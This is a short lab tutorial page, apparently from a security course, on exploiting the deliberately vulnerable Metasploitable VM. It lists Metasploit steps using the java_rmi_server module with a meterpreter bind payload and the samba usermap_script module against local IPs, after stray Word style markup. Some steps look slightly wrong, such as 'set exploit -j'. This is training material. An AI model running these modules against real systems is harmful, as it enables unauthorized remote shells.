Chapter 6
Exploiting a Client-side Target
Section 5
Exploiting Metasploitable
Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} This is a great way to test out exploits on your own without running into any legal matters. This helps improve security awareness for the user and helps understand how important it is to keep your system up to date with the newest technologies. - Open the terminal and type msfconsole - Use exploit/multi/misc/java_rmi_server, set lhost 192.168.1.66, set rport 1099, set lport 25882, set srvport 8080, set rhost 192.168.1.66, set payload java/meterpreter/bind_tcp, set target 0, set srvhost 0.0.0.0, and set exploit -j - Use exploit/multi/samba/usermap_script, set rhost 192.168.1.36, and exploit